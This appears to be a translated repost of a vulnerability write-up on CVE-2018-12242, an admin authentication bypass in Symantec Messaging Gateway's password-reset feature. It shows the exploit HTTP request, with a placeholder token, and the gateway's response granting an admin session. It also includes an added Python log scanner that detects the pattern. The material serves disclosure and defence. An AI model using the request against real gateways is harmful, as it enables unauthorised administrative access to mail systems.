
Analysis of the Email Gateway Authentication Bypass Vulnerability CVE-2018-12242

2025-01-19 Update From: SLTechnology News&Howtos


Shulou(Shulou.com)05/31 Report--

This article walks through the analysis of the email gateway authentication bypass vulnerability CVE-2018-12242. The editor considers it very practical and shares it here in the hope that readers will take something away from it. Let's take a look together.

Preface

In some information security assessment engagements it is difficult to get a clear picture of the target network's perimeter. As a last resort, we may test the application services the target exposes to the Internet. Such testing often yields a breakthrough, as with the Symantec email gateway authorization bypass vulnerability (CVE-2018-12242) that I want to share here.

Finding the vulnerability

Symantec Messaging Gateway, like most application login interfaces, has a password reset feature. When a login attempt fails, a "forgot password" link appears, after which the user is prompted for a user name. The password reset link that Symantec Messaging Gateway then issues contains an encrypted token, intended to ensure that only the corresponding user can complete the reset, and so to verify the identity of the user resetting the password.

The token is indeed encrypted, so how do we obtain the key? Fortunately, a similar bug in Symantec's mail gateway had already been disclosed. Security researcher Philip Pettersson found an authentication bypass vulnerability in Symantec's mail gateway that involved a parameter encrypted in the same way. He also analyzed a hard-coded key, which he described as follows:

Very well, the encryption uses a static password with the PBEWithMD5AndDES algorithm, and it is simply stored in the source code, but I will not reveal the encryption password or the complete encrypted notification string here.

Vulnerability testing

Back to our test. The password key is static and is set during installation of Symantec Messaging Gateway; we will not publish the password here. Under this encryption mechanism, if an attacker encrypts a value of the form "admin:" as the token and passes it in the GET parameter "authorization" shown below, the gateway issues a valid administrator session. The following is an example of the corresponding GET request:

GET /brightmail/action2.do?method=passwordReset&authorization=%3d HTTP/1.1
Host: 192.168.17.15
Connection: close
Cache-Control: max-age=0
Origin: https://192.168.17.15
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/67.0.3396.62 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9

The response from the Symantec gateway is as follows:

HTTP/1.1 302 Found
Server: Apache-Coyote/1.1
Cache-Control: no-store,no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
X-Frame-Options: SAMEORIGIN
Set-Cookie: JSESSIONID=97B8786DB8CC163EB2A4C595D1028E1D; Path=/brightmail; Secure; HttpOnly
Location: /brightmail/viewWelcome.do?userID=1
Content-Type: text/html;charset=UTF-8
Content-Length: 0
Connection: close

The request and response were captured in Burp (screenshot not reproduced here).

The JSESSIONID cookie set in that response is a valid administrator session (screenshot not reproduced here).
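From a defender's side, the exchange above leaves a recognisable trace in the gateway's web access log: a GET to /brightmail/action2.do with method=passwordReset and an authorization parameter, answered by a 302 to /brightmail/viewWelcome.do, which the client then fetches. The following Python is an added example, not code from the article or from Symantec; it parses constructed Common Log Format lines and flags that pattern, escalating when the same client follows the redirect.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed sample access-log lines in Common Log Format (not real gateway logs).
SAMPLE_LOG = """\
10.0.0.5 - - [12/Sep/2018:10:01:02 +0000] "GET /brightmail/viewLogin.do HTTP/1.1" 200 4123
10.0.0.9 - - [12/Sep/2018:10:01:07 +0000] "GET /brightmail/action2.do?method=passwordReset&authorization=PLACEHOLDER_TOKEN HTTP/1.1" 302 0
10.0.0.9 - - [12/Sep/2018:10:01:08 +0000] "GET /brightmail/viewWelcome.do?userID=1 HTTP/1.1" 200 8891
10.0.0.7 - - [12/Sep/2018:10:02:11 +0000] "POST /brightmail/action2.do?method=passwordReset HTTP/1.1" 200 512
"""

LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
                    r'"(?P<method>\S+) (?P<target>\S+) \S+" (?P<status>\d{3}) \S+$')

def parse_line(line):
    """Split one CLF line into fields; the query string becomes a dict."""
    m = LOG_RE.match(line)
    if m is None:
        return None
    rec = m.groupdict()
    parts = urlsplit(rec["target"])
    rec["path"] = parts.path
    rec["query"] = {k: v[0] for k, v in parse_qs(parts.query, keep_blank_values=True).items()}
    return rec

def classify(rec):
    """Return (severity, reason) when a request matches the CVE-2018-12242 shape, else None."""
    if rec["path"] != "/brightmail/action2.do" or rec["query"].get("method") != "passwordReset":
        return None
    if "authorization" not in rec["query"]:
        return None  # normal reset flow: no token parameter supplied
    if rec["status"] == "302":
        return ("high", "passwordReset with authorization token answered by 302 (session issued)")
    return ("medium", "passwordReset with authorization token")

def scan(log_text):
    """Flag token-bearing reset requests; mark those where the client then loads viewWelcome.do."""
    findings, suspects = [], set()
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec is None:
            continue
        if rec["path"] == "/brightmail/viewWelcome.do" and rec["ip"] in suspects:
            for f in findings:
                if f["ip"] == rec["ip"]:
                    f["followed_by_welcome"] = True
            continue
        hit = classify(rec)
        if hit:
            findings.append({"ip": rec["ip"], "ts": rec["ts"], "severity": hit[0],
                             "reason": hit[1], "followed_by_welcome": False})
            suspects.add(rec["ip"])
    return findings
```

On a patched gateway (10.6.6 or later) such a request should not yield a 302 with a session, so a "high" finding followed by a welcome-page load is worth investigating as a likely compromise of an unpatched appliance.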

Summary

This vulnerability can only be exploited if password reset is enabled on the Symantec mail gateway.

Severity: high

Attack scenario: remote

CVSS score: 7.1

Affected versions: all versions of Symantec Messaging Gateway prior to 10.6.6

Vulnerability reported: July 11, 2018

Vulnerability triaged: July 11, 2018

Vulnerability fixed, security bulletin and patch released: September 12, 2018

The above is the analysis of the mail gateway authentication bypass vulnerability CVE-2018-12242. The editor believes it contains knowledge points that we may encounter or use in daily work. I hope you can learn more from this article; for more details, please follow the industry information channel.
